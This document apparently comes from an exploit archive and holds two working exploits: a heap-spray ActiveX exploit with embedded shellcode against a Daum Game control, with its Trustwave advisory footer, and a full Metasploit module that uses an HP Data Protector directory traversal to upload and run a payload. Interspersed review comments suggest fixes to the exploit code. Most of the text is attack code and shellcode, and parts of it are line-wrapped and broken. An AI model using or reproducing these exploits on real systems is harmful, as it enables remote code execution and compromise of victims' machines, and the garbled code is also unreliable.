%05%05%05%05%05%05%05
%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%
05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%0
5%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05
%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%
05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%
05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%0
5%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%05%90%90%eb%06%a9%15%6c%74%90%90%90%90%90%90%90%90%90%90%90%90");
var buffer = "";
for (i=0; i < 18004; i++ ){
buffer += "%41";
}
buffer = unescape(buffer);
var shellcode = "\xda\xd1\xd9\x74\x24\xf4\x5f\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x5a\x48\x4f\x79\x33\x30\x45\x50\x35\x50\x71\x70\x6c\x49\x6b\x55\x65\x61\x4b\x62\x63\x54\x6e\x6b\x70\x52\x44\x70\x6e\x6b\x56\x32\x56\x6c\x6e\x6b\x56\x32\x34\x54\x6e\x6b\x33\x42\x74\x68\x34\x4f\x4e\x57\x32\x6a\x54\x66\x56\x51\x49\x6f\x45\x61\x49\x50\x4c\x6c\x37\x4c\x75\x31\x73\x4c\x73\x32\x76\x4c\x75\x70\x6b\x71\x5a\x6f\x76\x6d\x35\x51\x6b\x77\x38\x62\x5a\x50\x71\x42\x56\x37\x4e\x6b\x52\x72\x64\x50\x4c\x4b\x30\x42\x65\x6c\x73\x31\x6e\x30\x6c\x4b\x53\x70\x43\x48\x6e\x65\x6f\x30\x62\x54\x51\x5a\x55\x51\x4a\x70\x42\x70\x4c\x4b\x71\x58\x52\x38\x6e\x6b\x71\x48\x65\x70\x37\x71\x4e\x33\x6a\x43\x67\x4c\x71\x59\x4c\x4b\x75\x64\x4c\x4b\x57\x71\x6b\x66\x35\x61\x69\x6f\x54\x71\x4f\x30\x4e\x4c\x4b\x71\x48\x4f\x64\x4d\x47\x71\x7a\x67\x75\x68\
x59\x70\x74\x35\x79\x64\x46\x63\x71\x6d\x78\x78\x37\x4b\x51\x6d\x45\x74\x61\x65\x59\x72\x32\x78\x6c\x4b\x72\x78\x45\x74\x63\x31\x4b\x63\x30\x66\x6e\x6b\x64\x4c\x52\x6b\x6e\x6b\x52\x78\x37\x6c\x35\x51\x6e\x33\x4e\x6b\x66\x64\x6e\x6b\x37\x71\x6e\x30\x4b\x39\x77\x34\x54\x64\x75\x74\x71\x4b\x33\x6b\x71\x71\x56\x39\x61\x4a\x76\x31\x69\x6f\x6d\x30\x50\x58\x61\x4f\x32\x7a\x6c\x4b\x47\x62\x58\x6b\x4e\x66\x43\x6d\x50\x6a\x57\x71\x4e\x6d\x6e\x65\x6d\x69\x77\x70\x47\x70\x73\x30\x62\x70\x42\x48\x46\x51\x4e\x6b\x50\x6f\x6b\x37\x39\x6f\x4a\x75\x4d\x6b\x5a\x50\x38\x35\x4c\x62\x76\x36\x32\x48\x6c\x66\x4f\x65\x4d\x6d\x6f\x6d\x39\x6f\x69\x45\x55\x6c\x76\x66\x33\x4c\x76\x6a\x6d\x50\x39\x6b\x4b\x50\x52\x55\x66\x65\x6f\x4b\x53\x77\x76\x73\x63\x42\x30\x6f\x53\x5a\x65\x50\x73\x63\x79\x6f\x5a\x75\x61\x73\x33\x51\x30\x6c\x62\x43\x44\x6e\x35\x35\x61\x68\x63\x55\x43\x30\x41\x41";
var seh_code = overwrite + shellcode + buffer;
activex2.IconCreate(seh_code,'','');
</script>
</body>
</html>
<!--
Remediation Steps:
The vendor has released a fix in version 1.1.0.6
Revision History:
12/20/13 - Vulnerability disclosed to vendor
01/03/14 - Patch released by vendor
01/06/14 - Advisory published
01/07/14 - Confirmed fix
01/07/14 - Advisory revision published
References
1. http://game.daum.net/
About Trustwave:
Trustwave is the leading provider of on-demand and subscription-based
information security and payment card industry compliance management
solutions to businesses and government entities throughout the world. For
organizations faced with today's challenging data security and compliance
environment, Trustwave provides a unique approach with comprehensive
solutions that include its flagship TrustKeeper compliance management
software and other proprietary security solutions. Trustwave has helped
thousands of organizations--ranging from Fortune 500 businesses and large
financial institutions to small and medium-sized retailers--manage
compliance and secure their network infrastructure, data communications and
critical information assets. Trustwave is headquartered in Chicago with
offices throughout North America, South America, Europe, Africa, China and
Australia. For more information, visit https://www.trustwave.com
About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on
application security, incident response, penetration testing, physical
security and security research. The team has performed over a thousand
incident investigations, thousands of penetration tests and hundreds of
application security tests globally. In addition, the SpiderLabs Research
team provides intelligence through bleeding-edge research and proof of
concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs
Disclaimer:
The information provided in this advisory is provided "as is" without
warranty of any kind. Trustwave disclaims all warranties, either express or
implied, including the warranties of merchantability and fitness for a
particular purpose. In no event shall Trustwave or its suppliers be liable
for any damages whatsoever including direct, indirect, incidental,
consequential, loss of business profits or special damages, even if
Trustwave or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability
for consequential or incidental damages so the foregoing limitation may not
apply.
________________________________
This transmission may contain information that is privileged, confidential, and/or exempt from disclosure under applicable law. If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is strictly prohibited. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format.-->
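Review bot: the JavaScript as rendered here has been line-wrapped and no longer parses the way the advisory text describes. The `shellcode` literal is split at `\x68\` / `x59` across two lines, and a backslash immediately before a newline is a line continuation inside a JS string literal, so everything after the break is read as the literal characters `x59...` rather than as escaped bytes; the `overwrite` literal likewise contains `%05%%05`, where `unescape` leaves the unpaired `%` in place and adds a stray byte to the decoded buffer. If the file is meant to be an archival copy of the advisory, the two string literals should be restored to single lines so the stored PoC matches the one the advisory discusses. On the advisory itself: Remediation Steps names only the fixed version 1.1.0.6; since the control is identified by CLSID `16B6A027-2732-4028-9303-EFE3E95EF766` in the `<object>` tag, it would help readers who cannot update immediately to also mention setting the kill bit for that CLSID as an interim mitigation.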

platforms/windows/remote/31181.rb Executable file
@ -0,0 +1,157 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::EXE
include Msf::Exploit::WbemExec
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'HP Data Protector Backup Client Service Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in the Hewlett-Packard Data
Protector product. The vulnerability exists at the Backup Client Service (OmniInet.exe)
when parsing packets with opcode 42. This module has been tested successfully on HP Data
Protector 6.20 on Windows 2003 SP2 and Windows XP SP3.
},
'Author' =>
[
'Brian Gorenc', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'CVE', '2013-6194' ],
[ 'OSVDB', '101630' ],
[ 'BID', '64647' ],
[ 'ZDI', '14-003' ],
[ 'URL' , 'https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c03822422' ]
],
'Privileged' => true,
'Payload' =>
{
'Space' => 2048, # Payload embedded into an exe
'DisableNops' => true
},
'DefaultOptions' =>
{
'WfsDelay' => 5
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP Data Protector 6.20 build 370 / Windows 2003 SP2', { } ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jan 02 2014'))
register_options([Opt::RPORT(5555)], self.class)
end
def check
fingerprint = get_fingerprint
if fingerprint.nil?
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
minor = $1.to_i
else
return Exploit::CheckCode::Safe
end
if minor < 21
return Exploit::CheckCode::Vulnerable
elsif minor == 21
return Exploit::CheckCode::Detected
else
return Exploit::CheckCode::Detected
end
end
def exploit
# Setup the necessary files to do the wbemexec trick
vbs_name = rand_text_alpha(rand(10)+5) + '.vbs'
exe = generate_payload_exe
vbs = Msf::Util::EXE.to_exe_vbs(exe)
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, vbs_name)
# We can't upload binary contents, so embedding the exe into a VBS.
print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...")
upload_file("windows\\system32\\#{vbs_name}", vbs)
register_file_for_cleanup(vbs_name)
print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}")
upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
end
def peer
"#{rhost}:#{rport}"
end
def build_pkt(fields)
data = "\xff\xfe" # BOM Unicode
fields.each do |v|
data << "#{Rex::Text.to_unicode(v)}\x00\x00"
data << Rex::Text.to_unicode(" ") # Separator
end
data.chomp!(Rex::Text.to_unicode(" ")) # Delete last separator
return [data.length].pack("N") + data
end
def get_fingerprint
ommni = connect
ommni.put(rand_text_alpha_upper(64))
resp = ommni.get_once(-1)
disconnect
if resp.nil?
return nil
end
return Rex::Text.to_ascii(resp).chop.chomp # Delete unicode last nl
end
def upload_file(file_name, contents)
connect
pkt = build_pkt([
"2", # Message Type
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
rand_text_alpha(8),
"42", # Opcode
rand_text_alpha(8), # command
rand_text_alpha(8), # rissServerName
rand_text_alpha(8), # rissServerPort
"\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
contents # Certificate contents
])
sock.put(pkt)
sock.get_once
# You cannot be confident about the response to guess if upload
# has been successful or not. While testing, different result codes,
# including also no response because of timeout due to a process
# process execution after file write on the target
disconnect
end
end
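Review bot: the version gate in `check` treats "banner did not match" as "not vulnerable" and carries a dead branch: a fingerprint that fails the `/HP Data Protector A\.06\.(\d+)/` match falls into `else return Exploit::CheckCode::Safe` without any version having been evaluated, and in the chain below it `elsif minor == 21` and `else` both return `Exploit::CheckCode::Detected`, so the `elsif` arm adds nothing. Returning `Unknown` (or `Detected`, since `get_fingerprint` has already confirmed an OmniInet listener answering on the port) for an unmatched banner, and collapsing the last two arms into one `else`, would make the result honest about what was actually tested rather than reporting other major versions as `Safe` by accident. Two smaller points in `exploit`: the traversal hardcodes `windows\\system32\\` and `WINDOWS\\system32\\wbem\\mof\\` (two spellings of the same directory), so a non-default %SystemRoot% silently breaks the upload and should at least be called out in the description or an option; and the cleanup registrations (`register_file_for_cleanup(vbs_name)` with no directory, and `wbem\\mof\\good\\#{mof_name}` for a file uploaded to `wbem\\mof\\`) only resolve if the payload's working directory is system32 and the processed MOF really does land under `good\\`, so a one-line comment stating that assumption would save the next reader from reading the path mismatch as a typo. Cosmetic: the header comment URL `http//metasploit.com/download` is missing its colon.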